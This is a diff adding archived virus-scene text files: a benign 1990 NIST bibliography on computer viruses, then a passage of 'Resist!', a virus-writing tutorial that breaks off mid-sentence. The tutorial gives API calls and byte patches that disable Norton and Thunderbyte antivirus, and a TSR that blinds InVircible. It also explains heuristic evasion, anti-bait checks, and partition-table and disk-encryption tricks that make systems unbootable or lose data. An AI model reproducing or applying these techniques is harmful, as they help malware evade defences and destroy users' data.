+-=Aristotle: No Aristotle I didn't mean you when I said GOD, but Thanks.
+-=M.P.: Love ya software, Invircible.
+-=Thanks to these guys and groups:  Virogen, Terminal Velocity, NuKE, Falcon,
+  Vlad, Immortal Riot, P/S, ACVR, and every virus writer I didn't mention!!!
diff --git a/textfiles.com/virus/readlist.vir b/textfiles.com/virus/readlist.vir
new file mode 100644
index 00000000..1f02be60
--- /dev/null
+++ b/textfiles.com/virus/readlist.vir
@@ -0,0 +1,441 @@
+
+
+
+
+
+
+
+
+                 An Abbreviated Bibliography for
+
+
+
+                        Computer Viruses
+
+                               and
+
+                     Related Security Issues
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+                             Revised
+                         April 18, 1990
+
+
+
+
+
+
+    NIST   The National Institute of Standards and Technology
+
+                  ABSTRACT
+
+This document provides a list of suggested
+readings about computer viruses and other
+related threats to computer security.  The
+primary intended audience is management and
+those who need access to the basic facts,
+however readings are included that are also
+suitable for technically-oriented individuals
+who wish to learn more about the nature of
+computer viruses and techniques that can be
+used to reduce their potential threat.  The
+suggested readings range from general discus-
+sions on the nature of viruses and related
+threats, to technical articles which explore
+the details of various viruses, the mechan-
+isms they attack, and methods for controlling
+these threats to computer security.  Other
+articles are included that deal with more
+general aspects of computer security, but
+which have some bearing on the problem.
+
+
+
+
+
+
+
+
+
+
+
+
+The National Institute of Standards and Technology
+
+
+The National Institute of Standards and Tech-
+nology (NIST) has responsibility within the
+Federal Government for computer science and
+technology activities.  The programs of the
+NIST National Computer Systems Laboratory
+(NCSL) are designed to provide ADP standards,
+guidelines, and technical advisory services
+to improve the effectiveness of computer
+utilization and security, and to perform
+appropriate research and development efforts
+as foundation for such activities and prog-
+rams.  Copies of this paper as well as other
+publications may be obtained from the follow-
+ing address:
+
+National Institute of Standards and Technology
+
+Computer Security Management and Evaluation Group
+
+         Computer Security Division
+              A216, Technology
+           Gaithersburg, MD 20899
+
+
+                           BASIC TERMS
+
+
+The following list provides general definitions for basic terms
+used throughout the literature.  Some of the terms are relatively
+new and their definitions are not widely agreed upon, thus they
+may be used differently elsewhere.
+
+Computer Virus:  A name for
+software written to cause some
+form(s) of damage to a comput-
+ing system.  Computer viruses
+copy their instructions to
+other programs; the other pro-
+grams may continue to copy the
+instructions to more programs. 
+Depending on the author's mo-
+tives, the instructions may
+cause many different forms of
+damage, such as deleting files
+or crashing the system.  Com-
+puter viruses are so named be-
+cause of their functional sim-
+ilarity to biological viruses,
+in that they can spread rapid-
+ly throughout a host system. 
+The term is sometimes used in
+a general sense to cover many
+different types of harmful
+software, such as Trojan hor-
+ses or network worms.
+
+Network Worm:  A name for a
+program or command file that
+uses a computer network as a
+means for causing damage to
+computing systems.  From one
+system, a network worm may at-
+tack a second system by first
+establishing a network connec-
+tion with the second system. 
+The worm may then spread to
+other systems in the same man-
+ner.  A network worm is simil-
+ar to a computer virus in that
+its instructions can cause
+many different forms of
+damage.  However, a worm is a
+self-contained program that
+spreads to other systems,
+whereas a virus spreads to
+programs within the same sys-
+tem (a worm could do that as
+well).
+
+Malicious Software:  A general
+term for computer viruses,
+network worms, Trojan horses,
+and other software designed to
+deliberately circumvent
+established security
+mechanisms or codes of ethical
+conduct or both, to adversely
+affect the confidentiality,
+integrity, or availability of
+computer systems and networks.
+
+Unauthorized User(s):  A user
+who knowingly uses a system in
+a non-legitimate manner.  The
+user may or may not be an
+authorized user of the system. 
+The actions of the user
+violate established security
+mechanisms or policies, or
+codes of ethical conduct, or
+both.
+
+Trojan Horse:  A name for a
+program that disguises its
+harmful intent by purporting
+to accomplish some harmless
+and possibly useful function. 
+For example, a Trojan horse
+program could be advertised as
+a calculator, but it may
+actually perform some other
+function when executed such as
+modifying files.
+
+Back Door:  An entry point to
+a program or system that is
+hidden or disguised, perhaps
+created by the software's
+author for maintenance or
+other convenience reasons. 
+For example, an operating sys-
+tem's password mechanism may
+contain a back door such that
+a certain sequence of control
+characters may permit 
+
+access to the system manager
+account.  Once a back door be-
+comes known, it can be used by
+unauthorized users or
+malicious software to gain
+entry and cause damage.
+
+Time Bomb, Logic Bomb: 
+Mechanisms used by some
+examples of malicious software
+to cause damage after a
+predetermined event.  In the
+case of a time bomb, the event
+is a certain system date,
+whereas for a logic bomb, the
+event may vary.  For example,
+a computer virus may infect
+other programs, yet cause no
+other immediate damage.  If
+the virus contains a time bomb
+mechanism, the infected
+programs would routinely check
+the system date or time and
+compare it with a preset
+value.  When the actual date
+or time matches the preset
+value,  the destructive
+aspects of the virus code
+would be executed.  If the
+virus contains a logic bomb,
+the triggering event may be a
+certain sequence of key
+strokes, or the value of a
+counter.
+
+Anti-Virus Software:  Software
+designed to detect the occur-
+rence of a virus.  Sold as
+commercial products and as
+shareware, anti-virus programs
+can scan software for known
+viruses or monitor a system's
+behavior and raise alarms when
+activity occurs that is typi-
+cal of certain types of
+computer viruses.
+
+Isolated System:  A system
+that has been specially
+configured for determining
+whether applicable programs
+contain viruses or other types
+of malicious software.  The
+system is generally
+disconnected from any computer
+networks or linked systems,
+and contains test data or data
+that can be restored if
+damaged.  The system may use
+anti-virus or other monitoring
+software to detect the
+presence of malicious
+software.  
+
+Computer Security:  The tech-
+nological safeguards and
+management procedures that can
+be applied to computer
+hardware, programs, data, and
+facilities to assure the
+availability, integrity, and
+confidentiality of computer
+based resources and to assure
+that intended functions are
+performed without harmful side
+effects.
+                      SUGGESTED READINGS
+
+
+Adler, Marc, "Infection Protection: Antivirus Software" PC
+Magazine, April 25, 1989.
+
+Arkin, Stanley et al., "Prevention and Prosecution of High-Tech
+Crime," Matthew Bender Press Co., 1989.
+
+Brenner, Aaron, "LAN Security", LAN Magazine, August 1989.
+
+Bunzel, Rick, "Flu Season," Connect, Summer 1988.
+
+Cohen, Fred, "Computer Viruses," Proceedings of the 7th DoD/NBS
+Computer Security Conference, 1984.
+
+Computer Viruses - Proceedings of an Invitational Symposium, Oct
+10/11, 1988, Deloitte, Haskins, and Sells, 1989.
+
+Denning, Peter J., "Computer Viruses," American Scientist, Volume
+76 May-June 1988.
+
+Denning, Peter J., "The Internet Worm," American Scientist,
+Volume 77, March-April 1989.
+
+Dewdney, A. K., "Of Worms, Viruses and Core Wars," Scientific
+American, March 1989.
+
+Dvorak, John, "Virus Wars: A Serious Warning," PC Magazine, Feb
+29, 1988. 
+
+Federal Information Processing Standards Publication 112,
+Password Usage, National Bureau of Standards, May 1985.
+
+Fiedler, David and Hunter, Bruce M., "Unix System Administra-
+tion," Hayden Books, 1987.
+
+Fites, P.F., M.P.J. Kratz, and A.F. Brebner, "Control and
+Security of Computer Information Systems," Computer Science
+Press, 1989.
+
+Fitzgerald, Jerry, "Business Data Communications: Basic Concepts,
+Security, and Design," John Wiley and Sons, Inc., 1984.
+
+Gasser, Morrie, "Building a Secure Computer System," Van Nostrand
+Reinhold, New York, 1988.
+
+Grampp, F. T. and Morris, R. H., "UNIX Operating System
+Security," AT&T Bell Laboratories Technical Journal, October
+1984. 
+
+Greenberg, Ross, "Know Thy Viral Enemy," Byte Magazine, June
+1989.
+
+Hatkin, Martha E, and Robert B. J. Warner, "Smart Card Technol-
+ogy: New Methods for Computer Access Control,"  NIST Special
+Publication 500-157,  National Institute of Standards and Tech-
+nology, September 1988.
+
+Hoffman, Lance, "Modern Methods for Computer Security and
+Privacy," Prentice-Hall, 1977.
+
+Honan, Patrick, "Avoiding Virus Hysteria," Personal Computing,
+May 1989.
+
+Kurzban, Stanley A., "Viruses and Worms--What Can You Do?," ACM
+SIG Security, Audit, & Control, Volume 7 Number 1, Spring 1989.
+
+Lipner, S. and S. Kalman, "Computer Law,", Merrill Publishing
+Co., 1989.
+
+McAfee, John, "The Virus Cure," Datamation, Volume 35, Number 4,
+February 15, 1989.
+
+McLellan, Vin, "Computer Systems Under Siege," The New York
+Times, January 17, 1988.
+
+Murray, William H., "Epidemiology Application to Computer
+Viruses," Computers and Security, Volume 7, Number 2, April 1988.
+
+Parker, T., "Public domain software review: Trojans revisited,
+CROBOTS, and ATC," Computer Language, April 1987. 
+
+Pfleeger, Charles, P., "Security in Computing," Prentice-Hall,
+1989.
+
+Pozzo, Maria M., and Terence E. Gray, "An Approach to Containing
+Computer Viruses," Computers and Security, Volume 6, Number 4,
+August 1987.
+
+Rubenking, Neil, "Infection Protection," PC Magazine, April 25,
+1989.
+
+Schnaidt, Patricia, "Fasten Your Safety Belt," LAN Magazine,
+October 1987.
+
+Shoch, John F., and Jon A. Hupp, "The Worm Programs--Early
+Experience with a Distributed Computation," Communications of the
+ACM, Volume 25, Number 3, March 1982.
+
+Spafford, Eugene H., "The Internet Worm Program: An Analysis,"
+Purdue Technical Report CSD-TR-823, November 28, 1988.
+
+Spafford, Eugene H., Kathleen A. Heaphy, and David J. Ferbrache,
+"Computer Viruses - Dealing with Electronic Vandalism and
+Programmed Threats," ADAPSO Software Industry Division Report,
+1989.
+
+Stefanac, Suzanne, "Mad MACS," Macworld, November 1988.
+
+Steinauer, Dennis D., NBS Special Publication 500-120, Security
+of Personal Computer Systems: A Management Guide, National Bureau
+of Standards, January 1985.
+
+Stohl, Clifford, "The Cuckoo's Egg," Doubleday, 1989.
+
+Thompson, Ken, "Reflections on Trusting Trust (Deliberate
+Software Bugs),"  Communications of the ACM, Vol 27, August 1984.
+
+Tinto, Mario, "Computer Viruses: Prevention, Detection, and
+Treatment,"  National Computer Security Center C1 Tech. Rpt. C1-
+001-89, June 1989.
+
+Wack, John P., and Lisa J. Carnahan, "Computer Viruses and
+Related Threats: A Management Guide,"  NIST Special Publication
+500-166,  National Institute of Standards and Technology, August
+1989.
+
+White, Steve R., David M. Chess, and Chengi Jimmy Kuo, "Coping
+with Computer Viruses and Related Problems," Research Report
+Number RC 14405, International Business Machines Corporation,
+Yorktown Heights, New York, 1989, adapted and distributed as
+"Coping with Computer Viruses and Related Problems," Form G320-
+9913, International Business Machines Corporation, September
+1989.
+
+Witten, I. H., "Computer (In)security: infiltrating open sys-
+tems," Abacus (USA), Summer 1987.
+
+ELECTRONIC FORUMS:
+
+VIRUS-L is a moderated mail forum for discussing computer virus
+issues; comp.virus is a non-digested Usenet counterpart.  Infor-
+mation on accessing anti-virus, documentation, and back-issue
+archives is distributed periodically on the list.  Send subscrip-
+tion requests to: LISTSERV@LEHIIBM1.BITNET.  In the body of the
+message, enter "SUB VIRUS-L your name"
+
+RISKS-FORUM Digest is a moderated mail forum for discussing
+computer security issues as well as risks associated with other
+forms of technology.  Send subscription requests to:
+RISKS-Request@CSL.SRI.COM.
+
+The NIST Security Bulletin Board is a repository of computer
+security information open to the general public.  Users can
+download files, send messages, participate in forums, and access
+security alert information.  Dial 
+(301) 948-5717 at 2400/1200/300 BPS, parity none, 1 stop bit, 8-
+bit characters.
+
\ No newline at end of file
diff --git a/textfiles.com/virus/resist.txt b/textfiles.com/virus/resist.txt
new file mode 100644
index 00000000..4c0f1b4b
--- /dev/null
+++ b/textfiles.com/virus/resist.txt
@@ -0,0 +1,575 @@
+ ������������������������������ R e s i s t ! �������������������������������Ŀ
+
+                       ��� Futher virus strategies ���
+
+ ��������������������������� by Mouth of Sauron �������������������������������
+
+
+Disabling AutoProtect and NAVTSR
+�������������������������������������������������������������������������������
+One of the first antivirus programs available for Windows 95 was Norton Anti-
+virus. Except for the user interface, nothing much changed. The detection ratio
+and protection level is a joke. But nevertheless a lot of people use NAV(95)
+and have NAVTSR or AutoProtect installed, which should protect them from
+"all known and unknown" viruses. Hmmm, the Symantec advertisement is also quite
+funny, all that crap about 32 bit viruses. So far, no 32 bit virus is known,
+except Bizatch which was not finished when NAV95 was available in the shops.
+
+There are several possible ways to attack NAV, I will describe two of them
+here. First of all, AutoProtect and NAVTSR have an INT 2Fh API which allows you
+to detect, disable and enable the VxD/TSR, similar to VSAFE (remember VSLAY?):
+
+
+* The NAVTSR and AutoProtect API:
+
+ - NAV 4.0 (NAV for Windows 95):
+
+  Detect:
+    MOV AX,0FE00H
+    MOV SI,4E41H
+    MOV DI,4E55H
+    INT 2FH
+
+  Results:
+  -> AX = 0 TSR not active
+     AX = 1 TSR active
+     SI = 6E61H
+     DI = 6E75H
+
+  Enable:
+    MOV AX,0FE01H
+    MOV SI,4E41H
+    MOV DI,4E55H
+    INT 2FH
+
+  Disable:
+    MOV AX,0FE02H
+    MOV SI,4E41H
+    MOV DI,4E55H
+    INT 2FH
+
+
+The second approach is to delete the data files NAV uses to immunise files
+and the boot sector. NAV puts all this data into some files which are
+located in "\NCDTREE" by default, one directory for each drive. The user
+could change the location of these data files, but this option is well hidden
+so I guess none of these dummy users will ever change it. Well, just delete
+the files in "\NCDTREE" and NAV will recreate all the data without any warning
+next time it is called.
+
+By default, NAV doesn't scan the upper memory area (UMB) and will not detect
+viruses which go resident there. It's always a good idea to use UMB for staying
+resident, so use it!
+
+
+TBAV: No changes!
+�������������������������������������������������������������������������������
+
+* Disabling TBDRIVER:
+
+Although the method to disable TBDRIVER (from the great TBAV antivirus
+program) has been known for several months and several viruses are known
+to use this trick, Thunderbyte B.V. has done nothing to protect it's product
+against this attack. Up to version 6.51, the entry point code of TBDRIVER
+looks the same and can be modified without problems.
+
+Just scan the memory for
+
+  EB 05   (*)
+  EA xx xx xx xx
+  FA
+  9C
+  FC
+  53
+  50
+
+To disable TBDRIVER and all it's supporting TSRs like TBFILE, TBMEM, TBCHECK
+and TBSCANX just change the EB 05 (that's a SHORT JMP) to EB 00. The TSR is
+then disabled and can't intercept your virus. Furthermore, you can get the
+original INT 21h vector which is stored after the "EA" (FAR JMP).
+
+A good idea is to do the scanning while tracing INT 21h. When you patch the
+driver at once, no trace warning will be displayed. But simple INT 1 tracing
+is now quite dangerous, as there are many watchdog TSRs which intercept it.
+To prevent detection by these tools, you could scan each of the MCB areas
+(but keep in mind that TBDRIVER can also be loaded as a DEVICE!) for the
+signature, or you can use recursive tunneling. If you don't know recursive
+tunneling, take a look at ART (was released in an older VLAD magazine).
+It can be done even more easily, just code emulate the most important
+branch operands like SHORT JMP, NEAR JMP and FAR JMP to trace through the
+interrupt chain. As this is only emulation and not real single-step tracing,
+it can't be intercepted. The most effective method to get the original INT 21h
+vector is kernel scanning, which I will explain later in this text.
+
+Besides the scanner and resident watchdogs, TBAV contains a tool called
+TBCLEAN. This is a generic file virus cleaner, but unlike TBSCAN it does not
+use code emulation but rather does stupid INT 1 tracing with some security
+checks to prevent the virus from activating. The first virus which managed
+to activate while being cleaned with TBCLEAN was Varicella, but the method
+used to cheat TBCLEAN no longer works. Still, there are some ways to fool
+TBCLEAN. Besides using do-nothing interrupt calls like AH=01h INT 16h, AH=08h
+INT 10h or other INT 21h API calls, stack modifications (DEC SP, INC SP) or
+prefetch queue tricks to stop TBCLEAN from cleaning a file. COM infectors also
+can do a quick jump back to offset 100h to stop the cleaning process, but it
+is much more interesting to use TBCLEAN as a vector. TBCLEAN of course prevents
+all direct manipulation of the interrupt vector area (you also can use this
+to stop TBCLEAN), but obviously TBCLEAN has problems handling segment
+overrides like DS: ES: and the others.
+
+A simple example. Try to (TB)clean this little COM program:
+
+        mov AX,4c00h
+        db 2eh
+        int 21h
+        nop
+
+Funny, isn't it? The segment override in combination with the NOP prevents
+TBCLEAN from detecting the interrupt call, which will get executed for real
+now! To fully activate your virus, you could use AX=2521h (Set interrupt)
+to set a new interrupt 21h routine.
+Keep in mind that this override/NOP structure could be used for possible
+heuristic flags, so hide it behind a layer of (polymorphic) encryption.
+
+
+AHA - A dangerous new heuristic engine
+�������������������������������������������������������������������������������
+Unnoticed by most virus coders, S&S added a new heuristic engine to their
+already very good scanner FINDVIRUS from the Dr. Solomon Antivirus Toolkit.
+Besides it's very good hit ratios and detection of even the most polymorphic
+viruses, it also causes almost no false positives. But this is also the weak
+point of the heuristic. The coders' first aim was obviously for the
+heuristics not to cause any false positives, and the checks it does to
+prevent them are quite easy to come by. At first, the entry point of the
+program must be around 200 to 4000 bytes before the end of file. Normally,
+encrypted viruses look like this:
+
+  ���������������������������������������Ŀ
+  �                                       
+������������������������������������������������������������������Ŀ
+� 1  �               2                  � 3  �          4          �
+��������������������������������������������������������������������
+(1) = Program header, now points to virus entry point at (3)
+(2) = Old program code
+(3) = Entry point of virus with the decryptor
+(4) = Encrypted virus code
+
+This AHA detects without problems, but it fails to detect the same (!) virus
+if it's modified like this:
+
+  �����������������������������������������������������������������Ŀ
+  �                                                                 
+��������������������������������������������������������������������Ŀ
+� 1  �               2                  � 3  �          4          �5�
+����������������������������������������������������������������������
+                                                                   �
+                                          ���������������������������
+(1) = Program header, now points to virus entry point at (5)
+(2) = Old program code
+(3) = Real entry point of virus with the decryptor
+(4) = Encrypted virus code
+(5) = Simple or hidden jump to real virus start at (3)
+
+If the entry point lies out of the usual area, AHA thinks it's a normal
+program and stops analysing it. Besides this, AHA is very susceptible to
+anti-heuristic structures and it only cares about normal file infectors,
+ignoring boot viruses completely. AHA also doesn't emulate the interrupt
+or BIOS area at 0:0 or 40:0, so make some far calls to this area to stop
+AHA from emulating code. Stack modifications also confuse AHA, similar to
+prefetch queue tricks, but as these queue tricks don't run on Pentiums,
+it's no longer possible to use them. AHA is very effective at detecting
+polymorphic engines which create large amounts of garbage opcode, so create
+only "smooth" decryptors with your polymorphic engine.
+
+Slow motion
+�������������������������������������������������������������������������������
+I already discussed slow polymorphic engines some time ago, but as this
+is quite important I'm mentioning it here again. Most virus coders think
+that a polymorphic engine is good when it's very variable and changes
+with every infected file. This is true to some extent, but this also
+allows the virus researchers to quickly analyse the engine by just creating
+a few hundred files. Usually, the AV researchers get a lot of new viruses
+every week and they don't have the time to fully analyse every single virus.
+So, if the virus looks static after quickly infecting five or ten files, the
+researcher won't do further analysis and will just add a simple scan string to
+their product. This will happen if you are using a slow polymorphic engine,
+or at least slow down the randomizing of it. It might be a good idea to
+fetch the neccessary random factors only one time per day, at the time when
+the virus goes resident for example (what, your virus is not resident? Argh!).
+Also, use the system date instead of the system time to create random numbers.
+If the created decryptors change only very slowly, it'll become quite difficult
+to create enough representative infected bait files.
+
+Instead of inserting garbage opcodes, your engine should add "real" code,
+which looks like useful code. Use branches (calls!) and do many time consuming
+loops. An example of this is SMEG, which creates huge decryptors but the
+decryption method itself is too weak. It's useless to write a polymorphic
+engine which creates 2000 byte large decryptors but only uses a simple 8 bit
+XOR for encryption. Consider this for your engine and use several different
+encryption methods in combination. Another interesting method to fool scanners,
+especially TBSCAN is to fake known file headers like PKLITE, LZEXE or TURBO C.
+For example, all PKLITE compressed files always begin with:
+
+B8 xx xx        mov AX,????
+BA xx xx        mov DX,????
+05 xx xx        add AX,????
+3b 06 02 00     cmp AX,[2]
+
+73 1a           jnb Label_1         or:         72 1b           jb Label_1
+2d 20 00        sub AX,20h                      b4 09           mov AH,9
+FA              cli                             ba ?? ??        ba 18 01
+
+If your virus begins with these harmless opcodes, TBSCAN will just report
+"Looking ... > cp" and will stop scaning the file, thinking it's compressed
+with PKLITE. Take a look at PKLITE 1.15 or TURBO C headers and copy them,
+but keep in mind that these are fixed strings. A polymorphic engine could
+possibly fake a couple of these known file headers in order to cause confusion.
+
+Lastly, most code emulators don't fully emulate all interrupt 21h API
+calls. So, use some of them which result in known register contents, for
+example AH=52h INT 21h. This only returns a vector to the SYSVARS list in
+memory, and almost every DOS version (tested with MS-DOS, IBM-DOS and OS/2)
+returns BX=26h. Or access the interrupt vector table (at 0:0) directly, for
+example by creating a simple RETF there and then FAR CALLING this address.
+
+
+Generic Anti-Anti-Virus?
+�������������������������������������������������������������������������������
+There were many discussions about InVircible, a generic antivirus toolkit from
+NetZ Computing. The result of this was some anti-InVircible viruses which
+attack it by deleting the data files, IVB.NTZ by default. Of course, it's
+possible to rename this file, and one virus coder solved this by scanning
+every file in the current directory for the usual IVB.NTZ file header.
+Zvi Netivs' answer to One13th is to use variable file headers for IVB.NTZ, so
+you can't scan for them anymore. In fact, he is faking known file headers
+like EXE files and ZIP or ARJ archives. But it's still very easy to do a
+generic approach in order to find the data files. The solution I present here
+is very easy. When IVB.EXE starts, it checks the IV.INI configuration file
+for the SIG= parameter. The little TSR following here just intercepts this
+and overwrites the signature name in memory. IVB just says that it's renewing
+the data file and ignores any changes done to programs! Of course, it's
+possible to read out the data file name and delete it afterwards, or simply
+to delete IV.INI. In this case, InVircible just uses the standard IVB.NTZ
+name again. It is very important that your virus stops infecting and
+stealthing files when InVircible is executed because the virus checks are
+good and will most likely detect the virus, even if InVircible can't read
+it's data files.
+
+This is just a simple TSR, not a virus!
+
+                org 100h
+
+Virus_StartUp:  mov ax,3521h
+                int 21h
+                mov word ptr [OldInt21],bx
+                mov word ptr [OldInt21+2],es
+                mov ah,25h
+                mov dx,offset NewInt21
+                int 21h
+                mov ah,31h                              ;Stay resident
+                mov dx,(Virus_End-Virus_StartUp+100h)/10h+1
+                int 21h
+
+NewInt21:       cmp ah,3fh                              ;Read file access?
+                je l_Read
+EndInt21:       db 0eah                                 ;Jump back to old int21
+OldInt21        dd 0
+
+l_Read:         pushf                                   ;Read in the data
+                call dword ptr cs:[OldInt21]
+                jc l1
+                pushf
+                or ax,ax                                ;Nothing read?
+                jz l3
+                push ax
+                push cx
+                push si
+                mov si,dx
+                sub ax,4
+                xchg cx,ax
+                cmp word ptr [si],"IS"                  ;'SIG='?
+                jne l2
+                cmp word ptr [si+2],"=G"
+                jne l2
+l4:             cmp byte ptr [si+4]," "                 ;Wipe signature name
+                jb l2
+                mov byte ptr [si+4]," "
+                inc si
+                loop l4
+l2:             pop si
+                pop cx
+                pop ax
+l3:             popf
+l1:             retf 2
+
+Virus_End label byte
+
+You also might intercept the executing of IVB.EXE and add '/V' to the actual
+command-line! IVB will remove all the data files on it's own...
+
+
+Anti-Bait
+�������������������������������������������������������������������������������
+Anti-bait routines will further improve the stealth abilities of a virus and
+will keep stupid AV researchers from creating infected bait files without
+problems. When an AV researcher gets a new virus, he usually creates some
+samples with specific baits. Some AV companies have their own special bait
+collection which they use for testing the cleaning ability of their product.
+So it's quite neccessary for them to create baits. Some antivirus programs also
+create baits and execute them in order to catch active viruses. It's quite
+easy to avoid these bait traps if your virus doesn't infect files on
+the following conditions:
+
+1. The executable file has the actual day, month and year set in it's file
+   time stamp. Baits are usually created shortly before the virus should
+   infect them, so this is one easy method to avoid baits. Normal programs are
+   usually older than one month, so this is no real problem for the virus.
+   It even helps the virus to stay unnoticed, as new software is usually
+   especially carefully screened.
+
+2. Do not infect files which have numbers in their file name. Baits are usually
+   numbered (eg BAIT1.COM, BAIT2.COM, BAIT3.COM and so on) or they are created
+   using AH=5ah INT 21h (Create temporary file), whose file names also contain
+   numbers.
+
+This should be enough to prevent infecting most bait files, but there are
+more things your virus could check:
+
+3. Store the length of file name of an infected file and don't infect the next
+   file if it has the same name length. This is neccessary when the AV
+   researcher doesn't use numbers but letters for numbering the bait files
+   (eg BAITA.COM, BAITB.COM, BAITC.COM).
+
+4. As 3. doesn't work if only one bait file is created, you could further check
+   if the file is located in the root directory. A lot of antivirus programs
+   create their files in the root directory of the actual drive, or use C:\.
+   You check this by checking the file name for the amount of '\'s. Skip
+   files which only have one '\' in their name, that's all. You might need
+   to exclude COMMAND.COM from this check if you still want to infect it.
+
+5. A very powerful method to avoid baits is to add a timer function which
+   prevents the virus from infecting files in a short interval. Just set this
+   timer to 1-10 minutes and creating large amounts of baits will become a big
+   problem. It might also be funny to add a timer which will add a pause after
+   the virus activation and keep the virus from infecting files too soon.
+   The larger variants of Sirius.Alive use this.
+
+Keep in mind that the AV researcher can't patch the virus in order to remove
+these checks. They need unmodified versions of the virus and can't avoid all
+this anti-bait stuff.
+
+
+Armoured boot viruses
+�������������������������������������������������������������������������������
+Boot viruses are the most common viruses in the world. Viruses like Monkey,
+Stoned, AntiExe, Stealth_Boot, AntiCMOS, B1, Form or V-Sign are responsible
+for almost 90 percent of all infections world-wide. By now, most users know
+the 'undocumented' FDISK parameter '/MBR' which will replace the partition
+sector loader code with the standard DOS code, removing a virus from the
+partition sector. This works fine with almost all viruses, but with Monkey
+a new infection scheme was introduced which will cause total loss of data
+when the user tries to use 'FDISK /MBR'. All methods described below require
+that the virus is resident and has full stealth abilities or the system will
+halt at the next reboot. Monkey uses a simple trick: it not only infects the
+partition code but changes the master boot record at offset 1BEh to an invalid
+partition record. If you boot the system from a clean disk, the virus is gone
+and you can't access the hard disk anymore from DOS! Some stupid AV programs
+still can't handle this situation and refuse to scan the hard disk, not being
+able to detect or clean the virus now! If you now use FDISK, it will overwrite
+and remove the virus, but will keep the invalid partition record.
+The second method is quite unknown but just a simple improvement of the first
+one. And it's quite surprising for the unskilled user! To make it short:
+Just scan the partition record for the active partition entry (the one which
+is flagged with 80h), change it's type to EXTENDED (05h) and set the start
+cylinder/head/sector to 0/0/1. This causes an endless loop when you try to
+boot from a clean disk. The system just hangs up and it's not possible to
+boot without the virus. All MS-DOS versions from 4.0 to 7.0 have this bug,
+only IBM-DOS will finish the boot sequence, but as the partition record is
+invalid, you will only get 'Invalid drive C:' if you try to access the hard
+disk. So far, only a Gingerbread variant uses this trick, but it's very easy
+to add this feature to a boot virus and most people use MS-DOS, so why not
+use it?
+The third method is much more troublesome and causes real problems if
+it's not coded correctly. The idea is to encrypt the whole hard disk data
+area, like Onehalf does. Of course you can't encrypt the whole hard disk at
+once (a virus that needs hours to install seems very obvious to me...),
+but instead encrypt just a few sectors, starting at the beginning or end of the
+hard disk data area. Most AV programs can clean Onehalf now, but they only
+remove the virus from the partition and clean the files, but don't decrypt
+the hard disk. At last, use variable encryption when storing the original
+partition sector. Some AV programs scan the whole hard disk for those copies
+and use them for cleaning. Some programs can even rebuild the partition record
+if it's completely wiped and only the boot sectors are available. So it might
+be a good idea to encrypt them too.
+
+
+Some comments about file infection
+�������������������������������������������������������������������������������
+A lot of resident watchdogs heavily rely on INT 2Ah while intercepting system
+calls. Every time a INT 21h API call is done, the DOS kernel calls INT 2Ah
+with AH=80h after the INT 21h API call has finished. DOS doesn't call INT 2Ah
+after every function, but after all API calls which are necessary for viruses.
+By intercepting INT 2Ah and determining the original registers the watchdog
+can easily bypass and detect the virus! So it's a good idea to set INT 2Ah to
+a do-nothing handler while infecting files. Like INT 24h, just set it to an
+IRET opcode. This will leave a few AV watchdogs powerless, for example the
+AVP TSR or PCRX use this method to intercept system calls.
+
+Some stupid AV watchdogs even do a primitive handle check before doing
+further checks to the file handle. They only care about handles which are
+equal or higher than 5 (they just do a stupid BX>=5 check instead of using
+IOCTL). Normally, all handles below 5 are system handles and are occupied by
+PRN, AUX, NUL and other standard devices. But by using AH=45h INT 21h
+(Duplicate file handle) you can copy such a system handle to a higher handle,
+close it and reopen the target file. This new handle will then be a low handle,
+and a lot of watchdogs will ignore file modifications which are done while
+using this handle. After infecting the file, just copy back the system handle
+from the higher location to the still opened lower handle.
+
+More comments about interrupt usage
+�������������������������������������������������������������������������������
+Of course all of you know how to disable VSAFE in memory, using it's own API.
+But I really suggest that you stop using INT 13/16/21 AX=FA01h to remove VSAFE
+because now some AV watchdogs intercept this special call and will block your
+virus! VSAFE by itself never uses this call directly, so only viruses can be
+the reason for such a call. It's much more efficient to use recursive tunneling
+or kernel scanning to bypass this stupid watchdog.
+
+Don't use things like
+
+        mov AX,0deadh
+        int 21h
+        cmp AX,0acdch
+        je Virus_Installed
+
+for determining if your virus is already active! First of all, TBSCAN and
+other heuristic tools will detect this at once as a virus structure and
+some AV watchdogs will intercept any strange INT 21 function in order to catch
+resident viruses while they install themselves in memory. Instead, use some
+'normal' functions like AH=30h. For example, it's much harder to intercept:
+
+        mov AX,3096h
+        mov SI,1996h
+        mov DI,1996h
+        int 21h
+        cmp AL,3
+        jne No_Virus
+        cmp SI,1997h
+        jne No_Virus
+        cmp DI,1997h
+        je Virus_Installed
+
+The watchdog TSR now can't distinguish between a normal DOS version check
+and a virus are-you-there call.
+
+Or you could add more checks like a special SP range if your virus infects
+EXE only. If the virus always installs a new SP from 200h to 220h, don't
+react to self-check calls if the SP range is invalid. Some AV programs call
+all the known virus 'are-you-there' calls in order to detect the presence of
+a virus.
+
+Don't use simple INT 1 tracing! Almost every quality AV watchdog will intercept
+this (or it's absolutely worthless). Ita much better to use recursive tunneling
+or kernel scanning. Kernel scanning is very easy. The approach I now explain
+will work with MS-DOS and IBM-DOS when the DOS kernel is in the HMA, but
+it's easy enough to find the entry point when DOS is loaded low (for example 
+when the user pressed F5 while booting).
+
+The first thing you need is the DOS data segment. You can get it by calling
+AH=52h INT 21h, returning a pointer in ES:BX. Just scan the ES segment for
+the following structures:
+
+        90              nop
+        90              nop
+        E8 ?? 00        call A20_Check
+        2E FF 2E xx xx  jmp far CS:[xxxx]
+        90              nop
+        90              nop
+        ...
+
+There's a whole bunch of these calls, so after detecting the first one skip
+14h bytes in order to get the INT 21h entry point. Now you might patch this
+code fragment directly or further trace the JMP FAR into the HMA.
+
+You could also scan the HMA directly, just search for:
+
+        FA              cli
+        80 FC ??        cmp AH,?? (mostly 6Ch, but DOS 7.0 uses 73h)
+        77 ??           ja ??       (in fact, these 7x calls are used for
+        80 FC 33        cmp AH,33h   long file name access and drive locking)
+        72 ??           jc ??
+        74 ??           jz ??
+        80 Fc 64        cmp AH,64h
+        ...
+
+This one usually starts somewhere at F8xx-FFxx:4xxx (in my system this entry
+point is at FF06h:41E7h), and don't forget to enable the HMA before scanning
+this area. The simplest way to enable the HMA is to call a do-nothing INT 21h
+like GET DATE.
+
+A more interesting way to get the original INT 21h entry point is recursive
+tunneling. Instead of using the CPU single step mode you could emulate the
+most important jump operands and trace trought the interrupt chain. Unlike
+real tracing, this can't be intercepted by a watchdog. The only countermeasure
+is to add some traps in the watchdog code which the recursive tunneler can't
+emulate. Recursive tunneling is quite easy to do, just get the actual INT 21h
+vector and scan the area around this entry point for instructions like
+
